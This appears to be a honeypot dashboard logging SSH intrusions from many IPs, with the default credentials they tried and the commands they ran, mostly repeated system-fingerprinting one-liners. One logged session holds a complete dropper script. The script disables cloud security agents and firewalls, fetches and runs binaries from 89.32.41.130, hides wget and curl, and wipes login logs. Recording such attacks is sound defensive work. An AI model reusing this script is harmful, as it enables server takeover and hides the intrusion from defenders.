$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 strudel_root_17 (167.99.250.110) — Frankfurt am Main, Germany · 3 sessions · 12 cmds

2026-02-28 16:30 EST · as root/admin, root/qwerty, root/toor

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 eagle_root_28 (137.184.18.178) — North Bergen, United States · 3 sessions · 12 cmds

2026-02-28 15:59 EST · as admin/admin, root/1234, root/12345678

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 poutine_root_7 (165.22.227.30) — Toronto, Canada · 8 sessions · 32 cmds

2026-02-28 15:53 EST · as deploy/deploy, guest/guest, mysql/mysql

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 chai_root_17 (64.227.163.23) — Bengaluru, India · 4 sessions · 16 cmds

2026-02-28 15:54 EST · as root/12345678, root/admin, root/admin123

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 beefeater_root_11 (165.227.224.234) — Slough, United Kingdom · 3 sessions · 12 cmds

2026-02-28 15:49 EST · as root/12345678, root/admin, root/qwerty

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 clog_root_7 (146.190.229.152) — Amsterdam, Netherlands · 1 session · 4 cmds

2026-02-28 15:48 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 stein_root_8 (209.38.228.225) — Frankfurt am Main, Germany · 18 sessions · 72 cmds

2026-02-28 14:17 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 18x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×18

$ uname -s -v -n -m 2 > /dev/null ×18

$ uname -m 2 > /dev/null ×18

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×18

🎭 outback_root_9 (209.38.80.173) — Sydney, Australia · 4 sessions · 16 cmds

2026-02-28 14:45 EST · as admin/123456, admin/admin, root/1234

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 tea_root_2 (46.101.81.91) — Slough, United Kingdom · 16 sessions · 64 cmds

2026-02-28 12:35 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 16x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×16

$ uname -s -v -n -m 2 > /dev/null ×16

$ uname -m 2 > /dev/null ×16

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×16

🎭 crumpet_root_6 (209.97.185.248) — Slough, United Kingdom · 11 sessions · 44 cmds

2026-02-28 12:36 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 11x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×11

$ uname -s -v -n -m 2 > /dev/null ×11

$ uname -m 2 > /dev/null ×11

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×11

🎭 outback_root (209.38.24.1) — Sydney, Australia · 16 sessions · 16 cmds

2026-02-28 11:19 EST · as admin/admin, admin/admin123, deploy/deploy

Ran uname 16x across 16 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×16

🎭 eagle_root_29 (132.196.83.34) — Des Moines, United States · 1 session · 1 cmd

2026-02-28 08:58 EST · as root/12345678

env

$ env | head -10

🎭 shadow_root_48 (89.32.41.130) — Sânnicolau Mare, Romania · 1 session · 3 cmds

2026-02-28 08:04 EST · as root/12345678

make executable → skhqwensw → ls

$ #!/bin/sh; ; wdir="/tmp"; for i in "/tmp" "/var/tmp" "/dev/shm" "/usr" "/bin" "/home" "/root"; do; if [ -w "$i" ]; then; wdir="$i"; break; fi; done; cd "$wdir" || exit 1; ; ; systemctl stop YDService >/dev/null 2>&1; systemctl disable YDService >/dev/null 2>&1; systemctl stop tat_agent >/dev/null 2>&1; systemctl disable tat_agent >/dev/null 2>&1; ; ; systemctl mask YDService >/dev/null 2>&1; systemctl mask tat_agent >/dev/null 2>&1; ; ; systemctl daemon-reload; ; ; if command -v chattr >/dev/null 2>&1; then; chattr -R -i -a /usr/local/qcloud/ >/dev/null 2>&1; fi; ; ; pkill -9 YDService >/dev/null 2>&1; pkill -9 YDLive >/dev/null 2>&1; ; ; rm -rf /usr/local/qcloud/YunJing >/dev/null 2>&1; rm -rf /usr/local/qcloud/stargate >/dev/null 2>&1; rm -rf /usr/local/qcloud/monitor >/dev/null 2>&1; rm -rf /usr/local/qcloud/tat_agent >/dev/null 2>&1; ; mkdir -p /usr/local/qcloud/YunJing; mkdir -p /usr/local/qcloud/tat_agent; if command -v chattr >/dev/null 2>&1; then; chattr +i /usr/local/qcloud/YunJing; chattr +i /usr/local/qcloud/tat_agent; fi; ; ; ; disable_firewall() {; systemctl stop firewalld ufw >/dev/null 2>&1; systemctl disable firewalld ufw >/dev/null 2>&1; service firewalld stop >/dev/null 2>&1; service ufw stop >/dev/null 2>&1; ; if command -v iptables >/dev/null 2>&1; then; iptables -P INPUT ACCEPT >/dev/null 2>&1; iptables -P FORWARD ACCEPT >/dev/null 2>&1; iptables -P OUTPUT ACCEPT >/dev/null 2>&1; iptables -F >/dev/null 2>&1; iptables -X >/dev/null 2>&1; iptables -t nat -F >/dev/null 2>&1; iptables -t nat -X >/dev/null 2>&1; fi; }; disable_firewall; ; download_and_run() {; url="$1"; filename="$2"; ; if [ -f "./$filename" ] && [ -x "./$filename" ]; then; setsid "./$filename" >/dev/null 2>&1 &; return 0; fi; ; dl_bin=""; dl_args=""; ; if command -v good >/dev/null 2>&1; then; dl_bin="good"; dl_args="--no-check-certificate -q $url -O $filename"; elif command -v cool >/dev/null 2>&1; then; dl_bin="cool"; dl_args="-skL $url -o $filename"; elif command -v wget >/dev/null 2>&1; then; dl_bin="wget"; dl_args="--no-check-certificate -q $url -O $filename"; elif command -v curl >/dev/null 2>&1; then; dl_bin="curl"; dl_args="-skL $url -o $filename"; fi; ; if [ -z "$dl_bin" ]; then; apt-get update >/dev/null 2>&1 && apt-get install -y wget curl >/dev/null 2>&1; yum install -y wget curl >/dev/null 2>&1; if command -v wget >/dev/null 2>&1; then; dl_bin="wget"; dl_args="--no-check-certificate -q $url -O $filename"; fi; fi; ; if [ -n "$dl_bin" ]; then; $dl_bin $dl_args >/dev/null 2>&1; if [ -f "$filename" ]; then; chmod +x "$filename"; setsid "./$filename" >/dev/null 2>&1 &; fi; fi; }; ; lock_tools() {; command -v chattr >/dev/null 2>&1 && chattr -i /usr/bin/wget /usr/bin/curl >/dev/null 2>&1; ; w_path=$(which wget 2>/dev/null); if [ -n "$w_path" ]; then; case "$w_path" in; *good*) ;;; *) mv "$w_path" "$(dirname "$w_path")/good" >/dev/null 2>&1 ;;; esac; fi; ; c_path=$(which curl 2>/dev/null); if [ -n "$c_path" ]; then; case "$c_path" in; *cool*) ;;; *) mv "$c_path" "$(dirname "$c_path")/cool" >/dev/null 2>&1 ;;; esac; fi; }; ; SERVER_IP="89.32.41.130"; download_and_run "http://$SERVER_IP/vos.txt" "system_update"; download_and_run "http://$SERVER_IP/vox.txt" "network_conf"; ; lock_tools; ; cleanup() {; for log in /var/log/wtmp /var/log/btmp /var/log/lastlog /var/log/syslog /var/log/auth.log; do; if [ -f "$log" ]; then; echo > "$log" 2>/dev/null; fi; done; rm -f "$0"; }; cleanup; ; rm -- "$0"; rm -f /root/vos.sh; rm -f /tmp.vos.sh; exit 0

↳ make executable

$ /bin/skhqwensw

$ ls -la /var/run/gcc.pid

🎭 crumpet_root (209.97.190.211) — Slough, United Kingdom · 11 sessions · 11 cmds

2026-02-28 06:57 EST · as admin/admin, admin/admin123, deploy/deploy

Ran uname 11x across 11 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×11

🎭 blitz_root_14 (91.107.132.189) — Frankfurt Am Main, Germany · 1 session · 1 cmd

2026-02-28 06:24 EST · as root/1234

mount

$ mount | head -5

🍯 HONEYPOT DASHBOARD

🌍 Attack Origins

🏆 Top Attackers

📡 Recent Activity

🎬 Greatest Hits

🔑 Top Credentials

📈 Attack Timeline

📊 Daily Breakdown

📊 All-Time Stats

💀 Successful Logins — What They Did